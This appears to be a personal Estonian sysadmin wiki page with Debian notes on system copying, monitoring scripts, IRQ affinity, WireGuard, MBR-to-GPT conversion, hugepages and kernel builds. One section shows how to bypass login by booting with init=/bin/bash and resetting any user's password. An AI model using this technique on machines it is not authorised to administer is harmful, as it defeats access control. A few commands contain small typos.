* kopeerida rsync abil üle failisüsteem, vajalike eranditega (nt /proc, /sys, /home)

orig# rsync -avHXA --exclude --exclude-deleted --numeric-ids --exclude-from=/root/ex / root@x.x.x.x:/mnt/root/

* tekitada käsitsi excludetud kataloogid

# mkdir proc sys home tmp
# chmod 1777 tmp

* kohendada seadistusfaile

/etc/fstab
/etc/network/interfaces
/etc/udev/rules.d/70-persistent-net.rules

* ühendada külgeühendatud failisüsteemid lahti
* rebootida valikuda 'Boot Linux from hard disk'
* paigaldada bootloader

# install-grub --recheck --no-floppy /dev/sda

* bootida paigaldatud bootloaderi promptist käsitsi

grub> linux /vmlinuz... root=/dev/mapper/system-root ro
grub> initrd /initrd...
grub> boot

* genereerida /boot/grub/grub.conf

# update-grub

====Kopeeritud süsteemi korrastamine====

Kopeeritud süsteemi edasiandmisel võib olla asjakohane pöörata tähelepanu sellistele asjaoludele, st kas ei anta edasi soovimatult palju andmeid

* kasutajate kodukataloogid (.ssh, .pgpass jt)
* root, postgres jt süsteemsete ja muidu alles jäänud kasutajate .bash_history failid

# history -c
# rm .bash_history
...

* cron tööd (/etc/cron.*/*, crontab -l. /var/spool/cron ...)
* /var/backups (passwd.bak, shadow.pak jt)
* varunduse tarkvara agent (nt backupninja)
* monitooringu tarkvara agent (nt zabbix)
* liidestus AD vms keskse kasutajahalduse süsteemiga
* konfiguratsioooni halduse agent (nt puppet)
* logiserverisse logimine
* /tmp, /var/tmp kataloogide sisu
* /var/mail
* /usr/src

===USB data bridge kasutamine===

USB data bridge on kahe otsaga ja keskel asuvad punniga USB kaabel, mille abil saab kaks arvutit omavahel ühendada andmevahetuseks. Üks populaarne kaabel paistab välja sedasi

# lsusb
Bus 001 Device 005: ID 067b:2501 Prolific Technology, Inc. PL2501 USB-USB Bridge (USB 2.0)

Tundub, et Debiani tuumas on mitme sarnase kaabli tugi, aga mitte päris PL2501 oma. Toe tekitamist kirjeldatakse aadressil https://lkml.org/lkml/2012/7/23/106. Muudatuste tegemiseks sobib kasutada tekstis http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Tuuma_kompileerimine kirjeldatud protseduuri.

Peale mooduli laadimist tekib võrguseade

# ifconfig usb0
usb0 Link encap:Ethernet HWaddr a2:68:73:e5:d6:6e
inet6 addr: fe80::a068:73ff:fee5:d66e/64 Scope:Link
...

Kasulikud lisamaterjalid

* http://paulswasteland.blogspot.com.ee/2014/01/getting-prolific-pl-2501-based-usb-to.html

===Single user ehk ühekasutaja režiim===

Juhtumil, kui arvutisse ei saa root kasutajana sisse logida ja pole ka root parooli teada, et konsoolilt sisse logida, saab kasutada single user režiimi ja seal root parool muuta. Selleks tuleb

* GRUB bootloaderis liikuda nooltega meelepärase boot valiku peale
* vajutada e nagu edit (see on ekraani all kirjas)
* liikuda kernel parameetri juurde ja lisada kõige lõppu juurde tühik ning seejärel

init=/bin/bash

* valida ctrl-x vms (see on ekraani all kirjas) ja arvuti bootida

Tulemusena jõuab arvuti välja nn single user prompti. Selles olekus töötab arvutis suhteliselt vähe protsesse, juurfailisüsteem on monteeritud read-only olekus, võrk on seadistamata jne. root kasutaja või mõni muu kasutaja parooli seadmiseks tuleb

* monteerida juurfailisüsteem read-write olekusse

# mount -o rw,remount /
# passwd kasutajanimi
# sync
# mount -o ro,remount /
# sync
# oodata 30 sekundit
# reboot -f

Seejärel peaks saama seda uut parooli kasutada.

===Ksplice kasutamine===

Kasulikud lisamaterjalid

* https://oss.oracle.com/pipermail/ksplice-debian-8.0-updates/

===Arvuti ressursikasutuse kaardistamine===

Protsessid

# ps auxef

Avatud failid

# lsof -n -p PID
# lsof -n -u USER

Võrgusoketid

# lsof -i TCP
# lsof -i UDP
# lsof -U - unix domain sockets

Semafoorid

# ipcs -u

------ Shared Memory Status --------
segments allocated 2
pages allocated 4309411
pages resident 4136103
pages swapped 169536
Swap performance: 0 attempts 0 successes

------ Semaphore Status --------
used arrays = 64
allocated semaphores = 1083

------ Messages Status --------
allocated queues = 0
used headers = 0
used space = 0 bytes

Nt sellise skript kasutamine cron tööna kord minutis võiks koguda midagi, lisaks sar andmestikule

<pre>
# cat /opt/osres/bin/osres.sh
#!/bin/bash

AEG=`date +%Y%m%d-%H%M%S`;
LOG="/var/log/osres";

if test -f /tmp/osres.lock; then
echo "protsess kaib" >> /tmp/osres.log
# echo "kaivitame crontabist osres" >> /tmp/osres.log
else

touch /tmp/osres.lock
echo "protsess kaivitatakse" >> /tmp/osres.log

timeout 20 ps auxef >> ${LOG}/ps-auxef_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 lsof -n >> ${LOG}/lsof-n_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -a >> ${LOG}/ipcs-a_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -u >> ${LOG}/ipcs-u_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 netstat -anp >> ${LOG}/netstat-anp_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 conntrack -L >> ${LOG}/conntrack-L_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 touch /var/lib/postgresql/iocheck/io_${AEG}
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 127.0.0.1 > ${LOG}/ping_127.0.0.1_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 10.0.6.73 > ${LOG}/ping_10.0.6.73_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ssh root@127.0.0.1 "date > ${LOG}/touch-over-ssh_${AEG}.log"
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 dig @10.0.9.4 auul.pri.ee soa >> ${LOG}/dig-10.0.9.4-auul.pri.ee-soa_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
export PGPASSWORD="xxx"
timeout 20 psql -h 10.0.6.174 -U monitoring baas -c "select now();" >> ${LOG}/psql-10.0.6.174-monitoring-portaal_${AEG}.log

rm /tmp/osres.lock

fi
</pre>

====2026 kevade märkused====

<pre>
root@www-deb11-01:~# lsipc
RESOURCE DESCRIPTION LIMIT USED USE%
MSGMNI Number of message queues 32000 0 0.00%
MSGMAX Max size of message (bytes) 8192 - -
MSGMNB Default max size of queue (bytes) 16384 - -
SHMMNI Shared memory segments 4096 0 0.00%
SHMALL Shared memory pages 18446744073692774399 0 0.00%
SHMMAX Max size of shared memory segment (bytes) 18446744073692774399 - -
SHMMIN Min size of shared memory segment (bytes) 1 - -
SEMMNI Number of semaphore identifiers 32000 0 0.00%
SEMMNS Total number of semaphores 1024000000 0 0.00%
SEMMSL Max semaphores per semaphore set. 32000 - -
SEMOPM Max number of operations per semop(2) 500 - -
SEMVMX Semaphore max value 32767 - -
</pre>

===ConsoleKit===

2017 seisuga paistab see olevat vananenud tehnoloogia, kasutatakse systemd-logind.

Kasulikud lisamaterjalid

* TODO

===Võrgukaart - CPU affinity===

TODO

Järgneval viisil tegutsemiseks on vaja ircbalance deemoni töö lõpetada

# systemctl stop irqbalance

Võrgukaardi multi-queue omadused

<pre>
# ethtool -l eth0
Channel parameters for eth0:
Pre-set maximums:
RX: 8
TX: 8
Other: 0
Combined: 0
Current hardware settings:
RX: 2
TX: 2
Other: 0
Combined: 0
</pre>

Võrgukaardi ja cpu ja interrupt vahelised seosed

<pre>
# cat /proc/interrupts | egrep "CPU|eth"
CPU0 CPU1 CPU2 CPU3 CPU4 CPU5 CPU6 CPU7
48: 0 0 0 38 0 1339257 461106 0 PCI-MSI 2097152-edge eth0-0
49: 0 0 1 67 2071270 0 0 143901 PCI-MSI 2097153-edge eth0-1
57: 0 0 1738287 4 0 0 0 0 PCI-MSI 2099200-edge eth1-0
58: 0 3918708 0 38 0 0 0 0 PCI-MSI 2099201-edge eth1-1
</pre>

kus

* 48, 49 jnt on interrupt number

<pre>
# cat /proc/irq/57/smp_affinity
04
</pre>

kus

* hex 04 vastav väärtus on bin 0000 0100
* bin väärtuses olev paremalt kolmandal positsioonil olev '1' tähistab süsteemis olevat kolmandat protsessorit, st alates nullist lugedes CPU2

Affinity muutmiseks, st selle muutmiseks, milline cpu tegeleb millise võrgukaardiga (või võrgukaardi queue'ga) sobib öelda uus cpu number, nt seostamiseks CPU3 protsessoriga

# echo 08 > /proc/irq/57/smp_affinity

CPU numeratsioon

* 0000 0001 (bin) ehk 01 (hex) - esimene (CPU0)
* 0000 0010 (bin) ehk 02 (hex) - teine (CPU1)
* 0000 0100 (bin) ehk 04 (hex) - kolmas (CPU2)
* ...
* 1000 0000 (bin) ehk 80 (hex) - kahesas (CPU7)

Tundub, et võrgukaardi queue'de arvu muutmiseks sobib öelda

# ethtool -L eth0 tx 2
# ethtool -L eth0 rx 2

Siin kirjeldatud viisil tehtud seadistused ei kehtestu peale rebooti.

===Watchdog===

TODO

Kasulikud lisamaterjalid

* https://github.com/miniwark/miniwark-howtos/wiki/Hardware-Watchdog-Timer-setup-on-Ubuntu-12.04
* http://odroid.com/dokuwiki/doku.php?id=en:odroid_linux_watchdog
* https://pve.proxmox.com/wiki/High_Availability
* https://pve.proxmox.com/wiki/High_Availability_Cluster_4.x
* https://lesterlo.wordpress.com/2017/06/23/enable-ipmi-watchdog/
* http://www.madore.org/~david/linux/iTCO-wdt-test.html
* https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/virtualization_administration_guide/section-libvirt-dom-xml-watchdog
* https://casesup.com/using-the-nmi-watchdog-to-detect-hangs/
* https://gist.githubusercontent.com/wmealing/5523247/raw/4dc0474cabc35a9b79cd49fc7eab1f027ea80606/nmi-interrupts.txt
* https://github.com/spotify/linux/blob/master/Documentation/nmi_watchdog.txt

===Softdog===

TODO

===Misc===

* Kopeerimise kiiruse kontrollimine pipe peal

# apt-get install pv
# ssh root@192.168.112.113 'cd /tmp && dd if=/dev/pve/vm-109-disk-1 bs=1M' | pv -L 15m | dd of=/dev/kvmvg/vm-1019-disk-1 bs=1M

===Viber===

Viber https://www.viber.com/ on suhtlemistarkvara, paigaldamiseks sobib öelda nt Debian v. 8 ja v. 9 keskkonnas

# apt-get install libxcb-xkb1 libxcb-icccm4 libxcb-image0 libxcb-render-util0
# apt-get install libqt5gui5
# dpkg -i viber.com

ja käivitamiseks

$ /opt/viber/Viber

Kasulikud lisamaterjalid

* https://daksaitay.noblogs.org/post/2017/01/17/viber-on-debian-8-jessie-desktop/
* http://www.roydoer.com/viber-on-ubuntu-14-04-64bit/

===KeePassX===

MÄRKUS 20190126 - tundub, et õigem projekt on https://en.wikipedia.org/wiki/KeePassXC (C nagu community ja paketinimi keepassxc)

# apt-get intall keepassx

andmebaasi failinime lõpp on .kdbx

===Password Gorilla===

# apt-get install password-gorilla

andmebaasi failinime lõpp on .psafe3

===2018 - Debian v. 9 Stretch paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===2019 - Debian v. 10 Buster paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===linux-perf===

====Paigldamine====

Paigaldamiseks sobib öeld

# apt-get install linux-perf

====Kasutamine====

perf.data faili salvestamine käesolevasse kataloogi

# /usr/bin/perf record -e sched:sched_process_exec -a

Salvestatud andmete loetaval kujul esitamine

# /usr/bin/perf script --header

====Kasulikud lisamaterjalid====

* http://www.brendangregg.com/perf.html

===Wireguard===

====Debian v. 10 Buster====

TODO

Lisada buster-backports repo

TODO

Paigaldada buster-backports repost wireguard

kus

* paigaldatakse wireguard-dkms wireguard-tools wireguard
* paigaldatakse hulka bui

====Debian v. 11 Bullseye====

# apt-get install wireguard

====Debian v. 12 Bookworm====

Töötamine paistab nö serveri poolel

<pre>
root@debian-vpn:~# systemctl status wg-quick@wg0
● wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0
Loaded: loaded (/lib/systemd/system/wg-quick@.service; enabled; preset: enabled)
Active: active (exited) since Tue 2025-04-01 16:46:09 EEST; 9 months 19 days ago
Docs: man:wg-quick(8)
man:wg(8)
https://www.wireguard.com/
https://www.wireguard.com/quickstart/
https://git.zx2c4.com/wireguard-tools/about/src/man/wg-quick.8
https://git.zx2c4.com/wireguard-tools/about/src/man/wg.8
Main PID: 7536 (code=exited, status=0/SUCCESS)
CPU: 30ms

Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip link set mtu 1420 up dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.68/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.170/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.15/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.14/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.13/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.12/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.11/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.10/32 dev wg0
Apr 01 16:46:09 debian-10-vpn systemd[1]: Finished wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0.
</pre>

Seadistusfail

<pre>
/etc/wireguard/wg0.conf
</pre>

===MBR -> GPT partitsioonitabeli teisendamine===

====Tööpõhimõte====

* MBR partitsioonitabel hõlvab tavalisel lihtsal juhul plokkseadme esimsesed 512 Baiti
* GPT partitsioonitabel hõlvab tavaliselt plokkseadme esimsed ja viimased 34 * 512 Baiti
* tundub, et seoses uuema ajal 1 MBait piirile asjade sättimisega algab nii MBR kui GPT puhul esimene partitsioon 2048'ndal sektoril; st plokkseadme alguses on rikkalikult vaba ruumi teisendatud gpt jaoks; probleemiks võib olla, plokkseadme lõpus pole piisavalt vaba ruumi backup gpt jaoks
* sektori suurus on 512 Baiti
* MBR partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 16 baiti, millest 4 baiti ehk 16 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^32*512/1024^3 | bc -> 2048 Gigabyte)
* GPT partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 128 baiti, millest 8 baiti ehk 64 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^64*512/1024^3 | bc -> väga palju)
* muudatuse käigus partitsioone moodustavaid plokke plokkseadmel ümber ei paigutata
* kui mbr partitsioonitabelis on kasutusel ainult primaarsed partitsioonid ning ilma nö aukudeta partitsioonide vahel, siis on tulemuseks samuti ilma aukudeta üksteisele järgnevad gpt partitsioonid
* antud tekst ei kästile seda, aga boot kood asub mbr puhul esimeses 446 baidis
* gpt puhul põhimõtteliselt boot koodi ei ole kasutusel uefi põhises süsteemis (kasutatakse efi partitsiooni)

====Teisendamine====

Olgu lähtepunktiks selline plokkseadme kasutus, mbr partitsioonitabel

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xdaa60afa

Device Boot Start End Sectors Size Id Type
/dev/vdc1 2048 33097727 33095680 15.8G 83 Linux
</pre>

ning partitsioonil üks ext4 failisüsteem, mis on monteeritud

<pre>
# df -h -T /dev/vdc1
Filesystem Type Size Used Avail Use% Mounted on
/dev/vdc1 ext4 16G 1.7G 13G 12% /mnt/vdc1
</pre>

Eesmärk on teisendada partitsioonitabel gpt kujule säilitades seejuures failisüsteemi sisu. Selleks sobib kasutada sellist protseduuri, esmalt monteerida failisüsteem lahti

# umount /dev/vdc1

seejärel teha mbr partitsioonitabelist varukoopia

# dd if=/dev/vdc of=backup.mbr bs=512 count=1

gdisk ehk 'gpt fdisk' programm sobib gpt partitsioonitabeli haldamiseks, sealhulgas vaikimisi ta püüab mbr partitsioonitabeli teisendada gpt kujule. See on tehniliselt tavaliselt võimalik kuna mbr asub plokkseadme alguses ja seal on nö kasutamata ruumi.

<pre>
# gdisk /dev/vdc
GPT fdisk (gdisk) version 0.8.10

Partition table scan:
MBR: MBR only
BSD: not present
APM: not present
GPT: not present

***************************************************************
Found invalid GPT and valid MBR; converting MBR to GPT format
in memory. THIS OPERATION IS POTENTIALLY DESTRUCTIVE! Exit by
typing 'q' if you don't want to convert your MBR partitions
to GPT format!
***************************************************************

Command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed? (Y/N): Y
OK; writing new GUID partition table (GPT) to /dev/vdc.
The operation has completed successfully.
</pre>

kus

* programm tuvastab esmalt, et plokkseadmel on kasutusel MBR partitsioonitabel
* w abil tehakse muudatus
* Y abil kirjutatakse muudatus üles

Kuna Linux operatsioonisüsteemi puhul eristatakse plokkseadmel ja mälus olevat seisu plokkseadme kasutusest, siis tuleks täielikuks muudatuse kehtestamiseks teha lihtsalt reboot arvutile või öelda

# partprobe /dev/vdc

Tulemusena kasutatakse plokkseadmel gpt partitsioonitabelit

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: 469E6D74-0022-4200-B0FD-2C5FAED7DCAD

Device Start End Sectors Size Type
/dev/vdc1 2048 33302527 33300480 15.9G Linux filesystem
</pre>

====Muudatuse tagasivõtmine====

Muudatuse tagasivõtmiseks sobib öelda (kuigi nii jääb alles plokkseadme lõppu gpt backup; teatud bios'ide puhul võib see tekitada probleeme, bios on agar ja taastab selle alusel primaarse gpt partitsioonitabeli)

# umount /mnt/vdc1
# dd if=backup.mbr of=/dev/vdc bs=512 count=1
# partprobe /dev/vdc
# mount /dev/vdc1 /mnt/vdc1

====Kasulikud lisamaterjalid====

* https://easylinuxji.blogspot.com/2018/12/what-is-disk-partitioning-disk.html
* https://dannyda.com/2021/05/07/how-to-convert-ubuntu-20-04-1-lts-os-disk-from-mbr-to-gpt-gpt-to-mbr-without-losing-data/
* http://www.rodsbooks.com/gdisk/mbr2gpt.html

===Kasutajakonto operatsioonid===

Konto lukustamine kusjuures see takistab ainult parooliga autentimist, nt ssh võtmega saab sisse

# passwd -l kasutajanimi
# passwd -u kasutajanimi

Konto expire, see takistab igasuguseid kanaleid (eeldab, et pam vms on seadistatud expirega tegelema)

# usermod --expiredate 1 kasutajanimi

===grep kasutamine===

Perl regulaaravalidsega

<pre>
TODO
</pre>

Järjestikulised grep'id ei toimi vahel, aitab nt

<pre>
# tail -f /var/log/pveproxy/access.log | grep --line-buffered "PUT" | grep --line-buffered firewall | grep --line-buffered option
</pre>

===Debian v. 12 ext4 failisüsteem read-only olekus===

Tundub, et kõige tavalisem Debian v. 12 paigaldus, mis kasutab ext4 failisüsteemi (lvm kihi peal) käitub read-only olekus selliselt, et avatud failidesse mingil määral näiliselt kirjutamised jätkuvad. Seejuures kirjutajale jääb mulje, et kirjutamine õnnestus lõpetada edukalt. (Samal ajal uusi faile ei saa tekitada, olemasolevate failide muutmisi ei saa alustada.) Nähtuse jälgimiseks-taaskordamiseks-esilekutsumiseks sobib selline protseduur

1. Proxmox PVE keskkonnas töötab lvm põhisel storage'l Debian v. 12 virtuaalne arvuti; arvutis on kasutusel lvm ja sellel ext4 failisüsteem (lvm ei ole oluline)

2. Alustatakse eemalt pv abil piiratud kiirusega faili kopeerimist (etteruttavalt on siin toodud ära ka kopeeriv cat programmi edukas exit code; fail.img-4 on 36 MB suur)

$ cat fail.img-4 | ssh root@192.168.110.246 'pv -q -L3500K | cat > /root/tere4; echo $?'
0

3. umbes kolmveerandi kopeerimise pealt viiakse PVE host peal virtuaalsele arvutile vastav plokkseade read-only olekusse

# lvchange -pr vg_data/vm-615-disk-2

4. ootus on, et virtuaalne arvuti reageerib sellele oma juurfailisüsteemi read-only olekusse lülitamisega

5. ootus on, et kopeerimine lõpeb edukalt

6. ootus on, et vaatamata read only olekule Debian operatsioonisüsteemi saab veel natuke kasutada, ja küsida (tulemus klapib orig fail.img-4 failiga)

# sha256sum /root/tere4

7. virtuaalne arvuti stop'itakse PVE abil

8. viiakse plokkseade tagasi rw režiimi

# lvchange -prw vg_data/vm-615-disk-2

9. käivitatakse virtuaalne arvuti

10. kõnealune fail, mis näiliselt õnnestus edukalt kopeerida, on väiksema suurusega (või suurusega null)

Märkused

* analoogselt käitub Ubuntu v. 22.04
* Ubuntu v. 22.04 (ja tõenäoliselt Debian v. 12) + ext3 failisüsteem nö hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* Vanemad Ubuntu ja Debian versioonid hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* PVE host peal lvchange ütlemisele alternatiiviks on virtuaalse arvuti siseselt öelda

# echo u > /proc/sysrq-trigger

* lisaks PVE keskkonnale toimub analoogiline nähtus vmware virtuaalse arvutiga

===machine-id reset===

<pre>
# rm /etc/machine-id /var/lib/dbus/machine-id
# dbus-uuidgen | tee /etc/machine-id > /var/lib/dbus/machine-id
# chmod 0444 /etc/machine-id
# ls -ld /etc/machine-id /var/lib/dbus/machine-id
-r--r--r-- 1 root root 33 Apr 7 19:18 /etc/machine-id
-rw-r--r-- 1 root root 33 Apr 7 19:18 /var/lib/dbus/machine-id
</pre>

===Hugepages===

* TLB - Translation Lookaside Buffer
* THP - Transparent Huge Pages

Nö tavalises proxmox pve arvutis on selline hugepagendus

<pre>
root@pm60-trt:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
</pre>

Tundub, et niipea kui käivitatakse virtuaalne arvuti, mis sisaldab parameetrit 'hugepages: ...' tekitatakse kaks juurde

<pre>
root@valgustaja1:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
hugetlbfs 0 0 0 - /run/hugepages/kvm/2048kB
hugetlbfs 0 0 0 - /run/hugepages/kvm/1048576kB
</pre>

ning seda tehakse läbi nö käigult konstrueeritud systemd mount unitite

<pre>
root@valgustaja1:~# systemctl | grep huge
dev-hugepages.mount loaded active mounted Huge Pages File System
run-hugepages-kvm-1048576kB.mount loaded active mounted /run/hugepages/kvm/1048576kB
run-hugepages-kvm-2048kB.mount loaded active mounted /run/hugepages/kvm/2048kB
</pre>

Üks viis 1G hugepagendust lähtestada on kasutades sellist kernel-command-line'i

<pre>
root@valgustaja1:~# cat /proc/cmdline
initrd=\EFI\proxmox\6.8.8-2-pve\initrd.img-6.8.8-2-pve root=ZFS=rpool/ROOT/pve-1 boot=zfs default_hugepagesz=1G hugepagesz=1G hugepages=24
</pre>

Tulemusena paistab

<pre>
root@valgustaja1:~# grep -i huge /proc/meminfo
AnonHugePages: 0 kB
ShmemHugePages: 0 kB
FileHugePages: 0 kB
HugePages_Total: 24
HugePages_Free: 24
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 1048576 kB
Hugetlb: 25165824 kB
</pre>

ning

<pre>
root@valgustaja1:~# hugeadm --explain
Total System Memory: 192906 MB

Mount Point Options
/dev/hugepages rw,relatime,pagesize=1024M
/run/hugepages/kvm/2048kB rw,relatime,pagesize=2M
/run/hugepages/kvm/1048576kB rw,relatime,pagesize=1024M

Huge page pools:
Size Minimum Current Maximum Default
2097152 0 0 0
1073741824 24 24 24 *

Huge page sizes with configured pools:
1073741824

...
</pre>

Kasulikud lisamaterjalid

* https://wiki.postgresql.org/images/7/7d/PostgreSQL_and_Huge_pages_-_PGConf.2019.pdf
* https://pganalyze.com/blog/5mins-postgres-tuning-huge-pages

===reptyr===

reptyr ehk reparenting-terminal võimaldab saada uuesti kontakti kaotatud kuid eksisteeriva terminaliga. Paigaldamiseks sobib öelda

# apt-get install reptyr

Nt apt-get dist-upgrade programm käivitati, aga füüsiline konsool millelt seda tehti riknes. Mujalt arvutisse logides võib olla dist-upgrade tegevus peatunud nt sellises kohas

<pre>
# tail -f /var/log/apt/term.log
...
No DKMS packages installed: not changing Secure Boot validation state.
Setting up libmpc3:amd64 (1.3.1-1) ...
Setting up systemd-timesyncd (252.30-1~deb12u2) ...

Configuration file '/etc/systemd/timesyncd.conf'
==> Modified (by you or by a script) since installation.
==> Package distributor has shipped an updated version.
What would you like to do about it ? Your options are:
Y or I : install the package maintainer's version
N or O : keep your currently-installed version
D : show the differences between the versions
Z : start a shell to examine the situation
The default action is to keep your current version.
*** timesyncd.conf (Y/I/N/O/D/Z) [default=N] ?
</pre>

Ning terminali olukord

<pre>
root@tm-tartu-x470:~# ps auxf | less -N
..
135 root 1097 0.0 1.8 74500 18448 ? S Oct13 0:05 apt-get dist-upgrade
136 root 23408 0.0 0.6 11768 6388 pts/1 Ss+ Oct13 0:01 \_ /usr/bin/dpkg --status-fd 25 --configure --
...
</pre>

Osutub, et terminaliga saab taas kontakti öeldes, ja jätkates seejärel sisestusi peatunud kohast. NB! reptyr töötamine jätkub nö pimedast kohast, klaviatuurilt tuleb sisestada nii nagu asjakohane, nt antud juhul Enter sobib küsimusele 'timesyncd.conf (Y/I/N/O/D/Z) [default=N]' eitavalt vastamiseks

<pre>
root@tm-tartu-x470:~# /home/imre/reptyr 23408
[-] Timed out waiting for child stop.

Setting up libevent-core-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libatomic1:amd64 (12.2.0-14) ...
Setting up libvariable-magic-perl (0.63-1+b1) ...
Setting up udev (252.30-1~deb12u2) ...
Setting up libevent-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libio-html-perl (1.004-3) ...
Setting up libss2:amd64 (1.47.0-2) ...
Setting up libpod-parser-perl (1.65-1) ...
Setting up autopoint (0.21-12) ...
Setting up libb-hooks-op-check-perl:amd64 (0.22-2+b1) ...
</pre>

Seejärel jätkub apt-get dist-upgrade osakonnaga suhtlemine tavalisel viisil.

===pigz abil pakkimine===

# time tar -I pigz -cf ../20250507/rakendus-14-main_ee-20250507.tgz main_ee

===Debian v. 13 Trixie kerneli kompileerimine===

Väited

* tegevused toimuvad pve v. 8.4 virtuaalses arvutis, uefi jne
* kompileerimiseks on vajalik ca 40 G ruumi failisüsteemis
* arvutil on 32 cpu ja 24g mälu
* kompileerimine võtab aega ca 10 minutit

Nt eesmärgiga lisada süsteemi rtc_efi tuuma moodul ning käivitamisel lülitada välja rtc_cmos moodul, tavaliselt paistab rtc nii

<pre>
root@pm60-trt:~# dmesg | grep rtc
[ 5.472677] rtc_cmos 00:01: RTC can wake from S4
[ 5.477720] rtc_cmos 00:01: registered as rtc0
[ 5.482245] rtc_cmos 00:01: setting system clock to 2025-07-05T17:49:27 UTC (1751737767)
[ 5.490391] rtc_cmos 00:01: alarms up to one month, y3k, 114 bytes nvram
</pre>

Kompileerimine

<pre>
# apt-get install build-essential libncurses-dev
# apt-get build-dep linux
# linux-source-6.12

# su - imre
$ mkdir 20251001
$ cd 20251001
$ tar xaf /usr/src/linux-source-6.12.tar.xz
$ cd linux-source-6.12
</pre>

Kostümiseerimine

<pre>
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ cp /boot/config-6.12.48+deb13-amd64 .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe drivers/rtc/Kconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig

imre@kernel-deb-13-01:~/20251001-2/linux-source-6.12$ diff /boot/config-6.12.48+deb13-amd64 .config
5c5
< CONFIG_CC_VERSION_TEXT="x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0"
---
> CONFIG_CC_VERSION_TEXT="gcc (Debian 14.2.0-19) 14.2.0"
36a37
> CONFIG_BUILD_SALT=""
999a1001
> CONFIG_MODULE_SIG_ALL=y
8486c8488
< CONFIG_RTC_DRV_CMOS=y
---
> CONFIG_RTC_DRV_CMOS=m
8492a8495
> CONFIG_RTC_DRV_EFI=m
10868a10872
> CONFIG_MODULE_SIG_KEY="certs/signing_key.pem"
10870a10875
> CONFIG_SYSTEM_TRUSTED_KEYS=""

